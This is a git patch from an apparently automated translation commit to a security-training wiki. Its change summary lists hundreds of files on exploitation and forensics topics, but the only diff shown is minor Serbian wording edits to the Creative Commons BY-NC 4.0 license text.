From 3355766553cda6706a947060b8ee1b8cddc503ef Mon Sep 17 00:00:00 2001 From: Translator Date: Fri, 3 Jan 2025 12:33:41 +0000 Subject: [PATCH] Translated ['src/LICENSE.md', 'src/README.md', 'src/android-forensics.md --- src/LICENSE.md | 50 +- src/README.md | 2 +- src/SUMMARY.md | 1 + src/android-forensics.md | 4 +- src/backdoors/icmpsh.md | 20 +- src/backdoors/salseo.md | 110 +- src/banners/hacktricks-training.md | 12 +- .../arbitrary-write-2-exec/README.md | 2 - .../aw2exec-__malloc_hook.md | 48 +- .../arbitrary-write-2-exec/aw2exec-got-plt.md | 60 +- .../www2exec-.dtors-and-.fini_array.md | 38 +- .../arbitrary-write-2-exec/www2exec-atexit.md | 280 +- src/binary-exploitation/array-indexing.md | 16 +- .../README.md | 138 +- .../elf-tricks.md | 412 ++- .../tools/README.md | 128 +- .../tools/pwntools.md | 128 +- .../README.md | 26 +- .../aslr/README.md | 226 +- .../aslr/ret2plt.md | 58 +- .../aslr/ret2ret.md | 22 +- .../cet-and-shadow-stack.md | 18 +- .../libc-protections.md | 86 +- .../memory-tagging-extension-mte.md | 68 +- .../no-exec-nx.md | 14 +- .../pie/README.md | 24 +- .../pie/bypassing-canary-and-pie.md | 82 +- .../relro.md | 24 +- .../stack-canaries/README.md | 52 +- .../bf-forked-stack-canaries.md | 120 +- .../stack-canaries/print-stack-canary.md | 22 +- .../common-exploiting-problems.md | 18 +- .../format-strings/README.md | 171 +- .../format-strings-arbitrary-read-example.md | 144 +- .../format-strings/format-strings-template.md | 92 +- src/binary-exploitation/integer-overflow.md | 108 +- src/binary-exploitation/ios-exploiting.md | 285 +- src/binary-exploitation/libc-heap/README.md | 440 ++- .../libc-heap/bins-and-memory-allocations.md | 532 ++-- .../libc-heap/double-free.md | 158 +- .../libc-heap/fast-bin-attack.md | 152 +- .../libc-heap/heap-memory-functions/README.md | 2 +- .../libc-heap/heap-memory-functions/free.md | 482 ++-- .../heap-functions-security-checks.md | 218 +- .../malloc-and-sysmalloc.md | 2442 ++++++++--------- .../libc-heap/heap-memory-functions/unlink.md | 102 +- .../libc-heap/heap-overflow.md | 42 +- .../libc-heap/house-of-einherjar.md | 60 +- .../libc-heap/house-of-force.md | 66 +- .../libc-heap/house-of-lore.md | 54 +- .../libc-heap/house-of-orange.md | 80 +- .../libc-heap/house-of-rabbit.md | 84 +- .../libc-heap/house-of-roman.md | 100 +- .../libc-heap/house-of-spirit.md | 118 +- .../libc-heap/large-bin-attack.md | 56 +- .../libc-heap/off-by-one-overflow.md | 144 +- .../libc-heap/overwriting-a-freed-chunk.md | 20 +- .../libc-heap/tcache-bin-attack.md | 48 +- .../libc-heap/unlink-attack.md | 150 +- .../libc-heap/unsorted-bin-attack.md | 84 +- .../libc-heap/use-after-free/README.md | 12 +- .../libc-heap/use-after-free/first-fit.md | 44 +- .../rop-return-oriented-programing/README.md | 130 +- .../brop-blind-return-oriented-programming.md | 118 +- .../rop-return-oriented-programing/ret2csu.md | 78 +- .../ret2dlresolve.md | 48 +- .../ret2esp-ret2reg.md | 92 +- .../ret2lib/README.md | 116 +- .../ret2lib/one-gadget.md | 20 +- .../ret2lib/ret2lib-+-printf-leak-arm64.md | 120 +- .../rop-leaking-libc-address/README.md | 248 +- .../rop-leaking-libc-template.md | 212 +- .../ret2vdso.md | 16 +- .../rop-syscall-execv/README.md | 66 +- .../rop-syscall-execv/ret2syscall-arm64.md | 54 +- .../README.md | 40 +- .../srop-arm64.md | 84 +- .../stack-overflow/README.md | 60 +- .../stack-overflow/pointer-redirecting.md | 20 +- .../stack-overflow/ret2win/README.md | 80 +- .../stack-overflow/ret2win/ret2win-arm64.md | 74 +- .../stack-pivoting-ebp2ret-ebp-chaining.md | 164 +- .../stack-overflow/stack-shellcode/README.md | 62 +- .../stack-shellcode/stack-shellcode-arm64.md | 32 +- .../stack-overflow/uninitialized-variables.md | 68 +- ...windows-exploiting-basic-guide-oscp-lvl.md | 146 +- .../README.md | 180 +- src/burp-suite.md | 2 +- .../blockchain-and-crypto-currencies.md | 180 +- src/crypto-and-stego/certificates.md | 200 +- .../cipher-block-chaining-cbc-mac-priv.md | 44 +- src/crypto-and-stego/crypto-ctfs-tricks.md | 146 +- .../cryptographic-algorithms/README.md | 148 +- .../unpacking-binaries.md | 34 +- .../electronic-code-book-ecb.md | 68 +- src/crypto-and-stego/esoteric-languages.md | 10 +- .../hash-length-extension-attack.md | 40 +- src/crypto-and-stego/padding-oracle-priv.md | 77 +- .../rc4-encrypt-and-decrypt.md | 4 +- src/crypto-and-stego/stego-tricks.md | 140 +- src/cryptography/certificates.md | 182 +- .../cipher-block-chaining-cbc-mac-priv.md | 44 +- src/cryptography/crypto-ctfs-tricks.md | 144 +- src/cryptography/electronic-code-book-ecb.md | 68 +- .../hash-length-extension-attack.md | 40 +- src/cryptography/padding-oracle-priv.md | 80 +- src/cryptography/rc4-encrypt-and-decrypt.md | 4 +- src/emails-vulns.md | 3 +- .../linux-exploiting-basic-esp/README.md | 406 ++- .../linux-exploiting-basic-esp/fusion.md | 8 +- src/exploiting/tools/README.md | 124 +- src/exploiting/tools/pwntools.md | 128 +- ...windows-exploiting-basic-guide-oscp-lvl.md | 146 +- .../basic-forensic-methodology/README.md | 32 +- .../anti-forensic-techniques.md | 154 +- .../docker-forensics.md | 76 +- .../file-integrity-monitoring.md | 20 +- .../linux-forensics.md | 358 +-- .../malware-analysis.md | 110 +- .../memory-dump-analysis/README.md | 34 +- .../partitions-file-systems-carving/README.md | 226 +- .../file-data-carving-recovery-tools.md | 66 +- .../file-data-carving-tools.md | 44 +- .../pcap-inspection/README.md | 120 +- .../usb-keyboard-pcap-analysis.md | 8 +- .../pcap-inspection/usb-keystrokes.md | 8 +- .../pcap-inspection/wifi-pcap-analysis.md | 24 +- .../.pyc.md | 152 +- .../README.md | 2 +- .../browser-artifacts.md | 164 +- .../desofuscation-vbs-cscript.exe.md | 40 +- .../local-cloud-storage.md | 115 +- .../office-file-analysis.md | 30 +- .../pdf-file-analysis.md | 30 +- .../png-tricks.md | 6 +- .../video-and-audio-file-analysis.md | 22 +- .../zips-tricks.md | 20 +- .../windows-forensics/README.md | 455 ++- .../interesting-windows-registry-keys.md | 100 +- .../windows-forensics/windows-processes.md | 90 +- src/generic-hacking/brute-force.md | 358 +-- src/generic-hacking/exfiltration.md | 136 +- src/generic-hacking/reverse-shells/README.md | 2 +- .../expose-local-to-the-internet.md | 32 +- .../reverse-shells/full-ttys.md | 50 +- src/generic-hacking/reverse-shells/linux.md | 214 +- .../reverse-shells/msfvenom.md | 98 +- src/generic-hacking/reverse-shells/windows.md | 288 +- src/generic-hacking/search-exploits.md | 41 +- .../tunneling-and-port-forwarding.md | 304 +- .../basic-forensic-methodology/README.md | 32 +- .../anti-forensic-techniques.md | 114 +- .../docker-forensics.md | 74 +- .../file-integrity-monitoring.md | 20 +- .../image-acquisition-and-mount.md | 47 +- .../linux-forensics.md | 360 +-- .../malware-analysis.md | 110 +- .../memory-dump-analysis/README.md | 34 +- .../volatility-cheatsheet.md | 326 +-- .../partitions-file-systems-carving/README.md | 224 +- .../file-data-carving-recovery-tools.md | 66 +- .../pcap-inspection/README.md | 124 +- .../pcap-inspection/dnscat-exfiltration.md | 28 +- .../suricata-and-iptables-cheatsheet.md | 112 +- .../pcap-inspection/usb-keystrokes.md | 8 +- .../pcap-inspection/wifi-pcap-analysis.md | 26 +- .../pcap-inspection/wireshark-tricks.md | 116 +- .../.pyc.md | 152 +- .../README.md | 2 +- .../browser-artifacts.md | 164 +- .../desofuscation-vbs-cscript.exe.md | 40 +- .../local-cloud-storage.md | 115 +- .../office-file-analysis.md | 30 +- .../pdf-file-analysis.md | 30 +- .../png-tricks.md | 6 +- .../video-and-audio-file-analysis.md | 10 +- .../zips-tricks.md | 20 +- .../windows-forensics/README.md | 450 ++- .../interesting-windows-registry-keys.md | 52 +- .../external-recon-methodology/README.md | 528 ++-- .../github-leaked-secrets.md | 11 +- .../wide-source-code-search.md | 16 +- .../pentesting-methodology.md | 138 +- .../pentesting-network/README.md | 550 ++-- .../pentesting-network/dhcpv6.md | 36 +- .../pentesting-network/eigrp-attacks.md | 96 +- .../glbp-and-hsrp-attacks.md | 154 +- .../pentesting-network/ids-evasion.md | 56 +- .../lateral-vlan-segmentation-bypass.md | 34 +- .../network-protocols-explained-esp.md | 36 +- .../pentesting-network/nmap-summary-esp.md | 257 +- .../pentesting-network/pentesting-ipv6.md | 114 +- ...-ns-mdns-dns-and-wpad-and-relay-attacks.md | 112 +- .../spoofing-ssdp-and-upnp-devices.md | 32 +- .../pentesting-network/webrtc-dos.md | 36 +- .../pentesting-wifi/README.md | 613 ++--- .../pentesting-wifi/evil-twin-eap-tls.md | 36 +- .../phishing-methodology/README.md | 396 ++- .../phishing-methodology/clone-a-website.md | 22 +- .../phishing-methodology/detecting-phising.md | 64 +- .../phishing-documents.md | 158 +- .../python/README.md | 28 +- .../python/basic-python.md | 272 +- .../python/bruteforce-hash-few-chars.md | 52 +- .../python/bypass-python-sandboxes/README.md | 721 +++-- .../load_name-load_const-opcode-oob-read.md | 220 +- ...s-pollution-pythons-prototype-pollution.md | 208 +- .../python/pyscript.md | 212 +- .../python/python-internal-read-gadgets.md | 30 +- .../python/venv.md | 18 - .../python/web-requests.md | 71 +- .../threat-modeling.md | 96 +- .../escaping-from-gui-applications.md | 348 +-- .../firmware-analysis/README.md | 214 +- .../firmware-analysis/bootloader-testing.md | 62 +- .../firmware-analysis/firmware-integrity.md | 38 +- .../physical-attacks.md | 52 +- src/interesting-http.md | 21 +- .../bypass-bash-restrictions/README.md | 88 +- .../README.md | 97 +- .../ddexec.md | 76 +- src/linux-hardening/freeipa-pentesting.md | 114 +- .../linux-environment-variables.md | 86 +- .../linux-post-exploitation/README.md | 42 +- .../pam-pluggable-authentication-modules.md | 44 +- .../linux-privilege-escalation-checklist.md | 218 +- .../privilege-escalation/README.md | 148 +- .../privilege-escalation/cisco-vmanage.md | 52 +- .../containerd-ctr-privilege-escalation.md | 28 +- ...-command-injection-privilege-escalation.md | 458 ++-- .../docker-security/README.md | 32 +- ...-docker-socket-for-privilege-escalation.md | 4 +- .../docker-security/apparmor.md | 28 +- ...uthn-docker-access-authorization-plugin.md | 12 +- .../docker-security/cgroups.md | 20 +- .../README.md | 34 +- ...se_agent-exploit-relative-paths-to-pids.md | 2 +- .../sensitive-mounts.md | 10 +- .../docker-security/docker-privileged.md | 12 +- .../namespaces/cgroup-namespace.md | 14 +- .../namespaces/ipc-namespace.md | 18 +- .../namespaces/mount-namespace.md | 8 +- .../namespaces/network-namespace.md | 22 +- .../namespaces/pid-namespace.md | 6 +- .../namespaces/time-namespace.md | 10 +- .../namespaces/user-namespace.md | 44 +- .../namespaces/uts-namespace.md | 6 +- .../docker-security/seccomp.md | 16 +- .../docker-security/weaponizing-distroless.md | 2 +- .../electron-cef-chromium-debugger-abuse.md | 112 +- .../escaping-from-limited-bash.md | 176 +- .../privilege-escalation/euid-ruid-suid.md | 170 +- .../interesting-groups-linux-pe/README.md | 24 +- .../lxd-privilege-escalation.md | 2 +- .../ld.so.conf-example.md | 16 +- .../linux-active-directory.md | 18 +- .../linux-capabilities.md | 86 +- .../privilege-escalation/logstash.md | 4 +- .../nfs-no_root_squash-misconfiguration-pe.md | 12 +- .../payloads-to-execute.md | 4 +- .../splunk-lpe-and-persistence.md | 2 +- .../ssh-forward-agent-exploitation.md | 4 +- .../wildcards-spare-tricks.md | 12 +- src/linux-hardening/useful-linux-commands.md | 50 +- .../bypass-bash-restrictions.md | 4 +- .../privilege-escalation/exploiting-yum.md | 2 +- .../interesting-groups-linux-pe.md | 12 +- .../macos-auto-start-locations.md | 136 +- .../macos-red-teaming/README.md | 28 +- .../macos-red-teaming/macos-keychain.md | 56 +- .../macos-red-teaming/macos-mdm/README.md | 44 +- ...nrolling-devices-in-other-organisations.md | 20 +- .../README.md | 6 +- .../macos-function-hooking.md | 8 +- .../mac-os-architecture/macos-iokit.md | 20 +- .../macos-applefs.md | 4 +- .../macos-basic-objective-c.md | 8 +- .../macos-bypassing-firewalls.md | 2 +- .../macos-defensive-apps.md | 18 +- ...yld-hijacking-and-dyld_insert_libraries.md | 2 +- .../macos-file-extension-apps.md | 4 +- .../macos-gcd-grand-central-dispatch.md | 28 +- .../macos-privilege-escalation.md | 10 +- .../macos-protocols.md | 18 +- src/online-platforms-with-api.md | 79 +- src/other-web-tricks.md | 30 +- src/pentesting-dns.md | 6 +- .../hacking-jwt-json-web-tokens.md | 52 +- src/post-exploitation.md | 18 +- ...itive-information-disclosure-from-a-web.md | 14 +- 290 files changed, 13136 insertions(+), 16612 deletions(-) diff --git a/src/LICENSE.md b/src/LICENSE.md index 95118d40a..db40152b3 100644 --- a/src/LICENSE.md +++ b/src/LICENSE.md @@ -11,7 +11,7 @@ Formatiranje: https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/ # Attribution-NonCommercial 4.0 International -Creative Commons Corporation (“Creative Commons”) nije advokatska kancelarija i ne pruža pravne usluge ili pravne savete. Distribucija javnih licenci Creative Commons ne stvara odnos advokat-klijent ili neki drugi odnos. Creative Commons stavlja svoje licence i povezane informacije na raspolaganje na osnovu "kako jeste". Creative Commons ne daje nikakve garancije u vezi sa svojim licencama, bilo kojim materijalom licenciranim pod njihovim uslovima i odredbama, ili bilo kojim povezanim informacijama. Creative Commons se odriče svake odgovornosti za štetu koja proizađe iz njihove upotrebe u najvećoj mogućoj meri. +Creative Commons Corporation (“Creative Commons”) nije advokatska kancelarija i ne pruža pravne usluge ili pravne savete. Distribucija javnih licenci Creative Commons ne stvara odnos advokat-klijent ili neki drugi odnos. Creative Commons stavlja svoje licence i povezane informacije na raspolaganje na osnovu "kako jeste". Creative Commons ne daje nikakve garancije u vezi sa svojim licencama, bilo kojim materijalom licenciranim pod njihovim uslovima i odredbama, ili bilo kojim povezanim informacijama. Creative Commons se odriče svake odgovornosti za štete koje proizađu iz njihove upotrebe u najvećoj mogućoj meri. ## Korišćenje javnih licenci Creative Commons @@ -19,21 +19,21 @@ Javne licence Creative Commons pružaju standardni set uslova i odredbi koje kre - **Razmatranja za licencodavce:** Naše javne licence su namenjene onima koji su ovlašćeni da daju javnosti dozvolu za korišćenje materijala na načine koji su inače ograničeni autorskim pravom i određenim drugim pravima. Naše licence su nepovratne. Licencodavci treba da pročitaju i razumeju uslove i odredbe licence koju biraju pre nego što je primene. Licencodavci takođe treba da obezbede sva potrebna prava pre nego što primene naše licence kako bi javnost mogla ponovo koristiti materijal kako se očekuje. Licencodavci treba jasno da označe bilo koji materijal koji nije podložan licenci. Ovo uključuje drugi materijal licenciran pod CC, ili materijal korišćen pod izuzetkom ili ograničenjem autorskog prava. [Više razmatranja za licencodavce](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensors). -- **Razmatranja za javnost:** Korišćenjem jedne od naših javnih licenci, licencodavac daje javnosti dozvolu da koristi licencirani materijal pod navedenim uslovima i odredbama. Ako dozvola licencodavca nije potrebna iz bilo kog razloga – na primer, zbog bilo kog primenljivog izuzetka ili ograničenja autorskog prava – tada ta upotreba nije regulisana licencom. Naše licence daju samo dozvole pod autorskim pravom i određenim drugim pravima koja licencodavac ima ovlašćenje da dodeli. Upotreba licenciranog materijala može biti i dalje ograničena iz drugih razloga, uključujući zato što drugi imaju autorska ili druga prava na materijal. Licencodavac može postaviti posebne zahteve, kao što je traženje da sve promene budu označene ili opisane. Iako nije obavezno prema našim licencama, ohrabrujemo vas da poštujete te zahteve gde je to razumno. [Više razmatranja za javnost](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees). +- **Razmatranja za javnost:** Korišćenjem jedne od naših javnih licenci, licencodavac daje javnosti dozvolu da koristi licencirani materijal pod navedenim uslovima i odredbama. Ako dozvola licencodavca nije potrebna iz bilo kog razloga – na primer, zbog bilo kog primenljivog izuzetka ili ograničenja autorskog prava – tada ta upotreba nije regulisana licencom. Naše licence daju samo dozvole pod autorskim pravom i određenim drugim pravima koja licencodavac ima ovlašćenje da dodeli. Upotreba licenciranog materijala može biti i dalje ograničena iz drugih razloga, uključujući zato što drugi imaju autorska ili druga prava na materijal. Licencodavac može postaviti posebne zahteve, kao što je traženje da sve promene budu označene ili opisane. Iako to nije obavezno prema našim licencama, ohrabrujemo vas da poštujete te zahteve gde je to razumno. [Više razmatranja za javnost](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees). # Creative Commons Attribution-NonCommercial 4.0 International Public License -Korišćenjem Licenciranih Prava (definisanih u nastavku), prihvatate i slažete se da ćete biti obavezani uslovima i odredbama ove Creative Commons Attribution-NonCommercial 4.0 International Public License ("Javna Licenca"). U meri u kojoj se ova Javna Licenca može tumačiti kao ugovor, dodeljuju vam se Licencirana Prava u zamenu za vaše prihvatanje ovih uslova i odredbi, a Licencodavac vam dodeljuje takva prava u zamenu za koristi koje Licencodavac dobija od stavljanja Licenciranog Materijala na raspolaganje pod ovim uslovima i odredbama. +Korišćenjem Licenciranih Prava (definisanih u nastavku), prihvatate i slažete se da ćete biti vezani uslovima i odredbama ove Creative Commons Attribution-NonCommercial 4.0 International Public License ("Javna Licenca"). U meri u kojoj se ova Javna Licenca može tumačiti kao ugovor, dodeljuju vam se Licencirana Prava u zamenu za vaše prihvatanje ovih uslova i odredbi, a Licencodavac vam dodeljuje takva prava u zamenu za koristi koje Licencodavac dobija od stavljanja Licenciranog Materijala na raspolaganje pod ovim uslovima i odredbama. ## Odeljak 1 – Definicije. -a. **Prilagođeni Materijal** znači materijal podložan Autorskom pravu i Sličnim Pravima koji je izveden iz ili zasnovan na Licenciranom Materijalu i u kojem je Licencirani Materijal preveden, izmenjen, aranžiran, transformisan ili na drugi način modifikovan na način koji zahteva dozvolu prema Autorskom pravu i Sličnim Pravima koja drži Licencodavac. U svrhu ove Javne Licence, kada je Licencirani Materijal muzičko delo, izvođenje ili zvučna snimka, Prilagođeni Materijal se uvek proizvodi kada je Licencirani Materijal sinhronizovan u vremenskoj vezi sa pokretnom slikom. +a. **Prilagođeni Materijal** znači materijal koji je podložan Autorskom pravu i Sličnim Pravima koji je izveden iz ili zasnovan na Licenciranom Materijalu i u kojem je Licencirani Materijal preveden, izmenjen, aranžiran, transformisan ili na drugi način modifikovan na način koji zahteva dozvolu prema Autorskom pravu i Sličnim Pravima koja drži Licencodavac. U svrhe ove Javne Licence, kada je Licencirani Materijal muzičko delo, izvođenje ili zvučna snimka, Prilagođeni Materijal se uvek proizvodi kada je Licencirani Materijal sinhronizovan u vremenskoj vezi sa pokretnom slikom. b. **Licenca Prilagoditelja** znači licenca koju primenjujete na svoja Autorska prava i Slična prava u vašim doprinosima Prilagođenom Materijalu u skladu sa uslovima i odredbama ove Javne Licence. -c. **Autorska prava i Slična prava** znače autorska prava i/ili slična prava koja su blisko povezana sa autorskim pravom uključujući, bez ograničenja, izvođenje, emitovanje, zvučnu snimku i Sui Generis Prava Baze Podataka, bez obzira na to kako su prava označena ili kategorizovana. U svrhu ove Javne Licence, prava navedena u Odeljku 2(b)(1)-(2) nisu Autorska prava i Slična prava. +c. **Autorska prava i Slična prava** znače autorska prava i/ili slična prava koja su blisko povezana sa autorskim pravom uključujući, bez ograničenja, izvođenje, emitovanje, zvučnu snimku i Sui Generis Prava Baze Podataka, bez obzira na to kako su prava označena ili kategorizovana. U svrhe ove Javne Licence, prava navedena u Odeljku 2(b)(1)-(2) nisu Autorska prava i Slična prava. -d. **Efikasne Tehnološke Mere** znače one mere koje, u odsustvu odgovarajuće vlasti, ne mogu biti zaobiđene prema zakonima koji ispunjavaju obaveze prema Članu 11 WIPO Ugovora o Autorskom pravu usvojenog 20. decembra 1996. godine, i/ili sličnim međunarodnim sporazumima. +d. **Efikasne Tehnološke Mere** znače one mere koje, u odsustvu odgovarajuće vlasti, ne mogu biti zaobiđene prema zakonima koji ispunjavaju obaveze prema Članu 11 WIPO Ugovora o Autorskom Pravu usvojenog 20. decembra 1996. godine, i/ili sličnim međunarodnim sporazumima. e. **Izuzeci i Ograničenja** znače poštenu upotrebu, pošteno postupanje i/ili bilo koji drugi izuzetak ili ograničenje na Autorska prava i Slična prava koja se primenjuju na vašu upotrebu Licenciranog Materijala. @@ -43,11 +43,11 @@ g. **Licencirana Prava** znače prava koja su vam dodeljena podložna uslovima i h. **Licencodavac** znači pojedinac(e) ili entitet(e) koji dodeljuju prava prema ovoj Javnoj Licenci. -i. **NeKomercijalno** znači da nije prvenstveno namenjeno ili usmereno ka komercijalnoj koristi ili novčanoj naknadi. U svrhu ove Javne Licence, razmena Licenciranog Materijala za drugi materijal podložan Autorskom pravu i Sličnim Pravima putem digitalnog deljenja datoteka ili sličnih sredstava je NeKomercijalna pod uslovom da ne postoji plaćanje novčane naknade u vezi sa razmenom. +i. **Ne-komercijalno** znači da nije prvenstveno namenjeno ili usmereno ka komercijalnoj koristi ili novčanoj naknadi. U svrhe ove Javne Licence, razmena Licenciranog Materijala za drugi materijal podložan Autorskom pravu i Sličnim Pravima putem digitalnog deljenja datoteka ili sličnih sredstava je Ne-komercijalna pod uslovom da ne postoji plaćanje novčane naknade u vezi sa razmenom. j. **Deliti** znači pružiti materijal javnosti bilo kojim sredstvom ili procesom koji zahteva dozvolu prema Licenciranim Pravima, kao što su reprodukcija, javno prikazivanje, javno izvođenje, distribucija, širenje, komunikacija ili uvoz, i učiniti materijal dostupnim javnosti uključujući načine na koje članovi javnosti mogu pristupiti materijalu iz mesta i u vreme koje su pojedinačno izabrali. -k. **Sui Generis Prava Baze Podataka** znače prava osim autorskih prava koja proizlaze iz Direktive 96/9/EC Evropskog parlamenta i Saveta od 11. marta 1996. godine o pravnoj zaštiti baza podataka, kako je izmenjena i/ili nasledila, kao i druga suštinski ekvivalentna prava bilo gde u svetu. +k. **Sui Generis Prava Baze Podataka** znače prava osim autorskih prava koja proističu iz Direktive 96/9/EC Evropskog parlamenta i Saveta od 11. marta 1996. godine o pravnoj zaštiti baza podataka, kako je izmenjena i/ili nasledila, kao i druga suštinski ekvivalentna prava bilo gde u svetu. l. **Vi** znači pojedinac ili entitet koji koristi Licencirana Prava prema ovoj Javnoj Licenci. Vaš ima odgovarajuće značenje. @@ -57,33 +57,33 @@ a. **_Dodeljivanje licence._** 1. Podložna uslovima i odredbama ove Javne Licence, Licencodavac ovim putem dodeljuje vam svetsku, bezautorsku, ne-prenosivu, ne-ekskluzivnu, nepovratnu licencu za korišćenje Licenciranih Prava u Licenciranom Materijalu da: -A. reprodukujete i Delite Licencirani Materijal, u celini ili delimično, samo za NeKomercijalne svrhe; i +A. reprodukujete i Delite Licencirani Materijal, u celini ili delimično, samo za Ne-komercijalne svrhe; i -B. proizvodite, reprodukujete i Delite Prilagođeni Materijal samo za NeKomercijalne svrhe. +B. proizvodite, reprodukujete i Delite Prilagođeni Materijal samo za Ne-komercijalne svrhe. 2. **Izuzeci i Ograničenja.** Radi izbegavanja sumnje, gde se Izuzeci i Ograničenja primenjuju na vašu upotrebu, ova Javna Licenca se ne primenjuje, i ne morate se pridržavati njenih uslova i odredbi. 3. **Trajanje.** Trajanje ove Javne Licence je navedeno u Odeljku 6(a). -4. **Mediji i formati; tehničke modifikacije dozvoljene.** Licencodavac vam odobrava da koristite Licencirana Prava u svim medijima i formatima, bilo da su sada poznati ili će biti stvoreni, i da napravite tehničke modifikacije potrebne za to. Licencodavac se odriče i/ili se slaže da ne tvrdi bilo koje pravo ili ovlašćenje da vam zabrani pravljenje tehničkih modifikacija potrebnih za korišćenje Licenciranih Prava, uključujući tehničke modifikacije potrebne za zaobilaženje Efikasnih Tehnoloških Mera. U svrhu ove Javne Licence, jednostavno pravljenje modifikacija odobrenih ovim Odeljkom 2(a)(4) nikada ne proizvodi Prilagođeni Materijal. -5. **Primalac nizvodno.** +4. **Mediji i formati; tehničke modifikacije dozvoljene.** Licencodavac vam odobrava da koristite Licencirana Prava u svim medijima i formatima, bilo da su sada poznati ili će biti stvoreni, i da napravite tehničke modifikacije potrebne za to. Licencodavac se odriče i/ili se slaže da ne tvrdi bilo koje pravo ili ovlašćenje da vam zabrani da napravite tehničke modifikacije potrebne za korišćenje Licenciranih Prava, uključujući tehničke modifikacije potrebne za zaobilaženje Efikasnih Tehnoloških Mera. U svrhe ove Javne Licence, jednostavno pravljenje modifikacija odobrenih ovim Odeljkom 2(a)(4) nikada ne proizvodi Prilagođeni Materijal. +5. **Primalci nizvodno.** A. **Ponuda od Licencodavca – Licencirani Materijal.** Svaki primalac Licenciranog Materijala automatski prima ponudu od Licencodavca da koristi Licencirana Prava pod uslovima i odredbama ove Javne Licence. B. **Bez nizvodnih ograničenja.** Ne smete ponuditi ili nametnuti bilo koje dodatne ili različite uslove ili odredbe na, ili primeniti bilo koje Efikasne Tehnološke Mere na, Licencirani Materijal ako to ograničava korišćenje Licenciranih Prava od strane bilo kog primaoca Licenciranog Materijala. -6. **Bez podrške.** Ništa u ovoj Javnoj Licenci ne predstavlja ili se ne može tumačiti kao dozvola da se tvrdi ili implicira da ste vi, ili da je vaša upotreba Licenciranog Materijala, povezana sa, ili sponzorisana, podržana ili dodeljena zvanični status od strane, Licencodavca ili drugih koji su označeni da prime atribuciju kako je navedeno u Odeljku 3(a)(1)(A)(i). +6. **Bez odobravanja.** Ništa u ovoj Javnoj Licenci ne predstavlja ili se ne može tumačiti kao dozvola da se tvrdi ili implicira da ste vi, ili da je vaša upotreba Licenciranog Materijala, povezana sa, ili sponzorisana, odobrena ili dodeljena zvanični status od strane, Licencodavca ili drugih koji su označeni da prime atribuciju kako je navedeno u Odeljku 3(a)(1)(A)(i). -b. **_Ostala prava._** +b. **_Druga prava._** 1. Moralna prava, kao što je pravo na integritet, nisu licencirana prema ovoj Javnoj Licenci, niti su prava na javnost, privatnost i/ili druga slična prava ličnosti; međutim, u meri u kojoj je to moguće, Licencodavac se odriče i/ili se slaže da ne tvrdi bilo koja takva prava koja drži Licencodavac u ograničenoj meri potrebnoj da vam omogući korišćenje Licenciranih Prava, ali ne i drugačije. 2. Patenti i prava na zaštitne znakove nisu licencirani prema ovoj Javnoj Licenci. -3. U meri u kojoj je to moguće, Licencodavac se odriče bilo kojeg prava da prikuplja tantijeme od vas za korišćenje Licenciranih Prava, bilo direktno ili putem kolektivnog društva prema bilo kojem dobrovoljnom ili odustajivom zakonskom ili obaveznom licencnom režimu. U svim drugim slučajevima Licencodavac izričito zadržava bilo koje pravo da prikuplja takve tantijeme, uključujući kada se Licencirani Materijal koristi na način koji nije za NeKomercijalne svrhe. +3. U meri u kojoj je to moguće, Licencodavac se odriče bilo kojeg prava da prikuplja naknade od vas za korišćenje Licenciranih Prava, bilo direktno ili putem kolektivnog društva prema bilo kojem dobrovoljnom ili odustajivom zakonskom ili obaveznom licencnom režimu. U svim drugim slučajevima Licencodavac izričito zadržava bilo koje pravo da prikuplja takve naknade, uključujući kada se Licencirani Materijal koristi na način koji nije za Ne-komercijalne svrhe. ## Odeljak 3 – Uslovi licence. -Vaša upotreba Licenciranih Prava je izričito podložna sledećim uslovima. +Vaša upotreba Licenciranih Prava izričito je podložna sledećim uslovima. a. **_Atribucija._** @@ -105,9 +105,9 @@ B. naznačiti ako ste izmenili Licencirani Materijal i zadržati oznaku bilo koj C. naznačiti da je Licencirani Materijal licenciran pod ovom Javnom Licencom, i uključiti tekst ili URI ili hyperlink ka ovoj Javnoj Licenci. -2. Možete ispuniti uslove iz Odeljka 3(a)(1) na bilo koji razuman način na osnovu medija, sredstava i konteksta u kojem Delite Licencirani Materijal. Na primer, može biti razumno ispuniti uslove pružanjem URI ili hyperlinka ka resursu koji uključuje potrebne informacije. +2. Možete ispuniti uslove u Odeljku 3(a)(1) na bilo koji razuman način na osnovu medija, sredstava i konteksta u kojem Delite Licencirani Materijal. Na primer, može biti razumno ispuniti uslove pružanjem URI ili hyperlinka ka resursu koji uključuje potrebne informacije. -3. Ako to zatraži Licencodavac, morate ukloniti bilo koju od informacija zahtevanih Odeljkom 3(a)(1)(A) u meri koja je razumno moguća. +3. Ako to zatraži Licencodavac, morate ukloniti bilo koju od informacija zahtevanih u Odeljku 3(a)(1)(A) u meri koja je razumno moguća. 4. Ako Delite Prilagođeni Materijal koji proizvodite, Licenca Prilagoditelja koju primenjujete ne sme sprečiti primaoce Prilagođenog Materijala da se pridržavaju ove Javne Licence. @@ -115,17 +115,17 @@ C. naznačiti da je Licencirani Materijal licenciran pod ovom Javnom Licencom, i Gde Licencirana Prava uključuju Sui Generis Prava Baze Podataka koja se primenjuju na vašu upotrebu Licenciranog Materijala: -a. radi izbegavanja sumnje, Odeljak 2(a)(1) dodeljuje vam pravo da ekstraktujete, ponovo koristite, reprodukujete i Delite sve ili značajan deo sadržaja baze podataka samo za NeKomercijalne svrhe; +a. radi izbegavanja sumnje, Odeljak 2(a)(1) dodeljuje vam pravo da ekstraktujete, ponovo koristite, reprodukujete i Delite sve ili značajan deo sadržaja baze podataka samo za Ne-komercijalne svrhe; b. ako uključite sve ili značajan deo sadržaja baze podataka u bazu podataka u kojoj imate Sui Generis Prava Baze Podataka, tada baza podataka u kojoj imate Sui Generis Prava Baze Podataka (ali ne njeni pojedinačni sadržaji) je Prilagođeni Materijal; i -c. morate se pridržavati uslova iz Odeljka 3(a) ako Delite sve ili značajan deo sadržaja baze podataka. +c. morate se pridržavati uslova u Odeljku 3(a) ako Delite sve ili značajan deo sadržaja baze podataka. Radi izbegavanja sumnje, ovaj Odeljak 4 dopunjuje i ne zamenjuje vaše obaveze prema ovoj Javnoj Licenci gde Licencirana Prava uključuju druga Autorska prava i Slična prava. ## Odeljak 5 – Odricanje od garancija i ograničenje 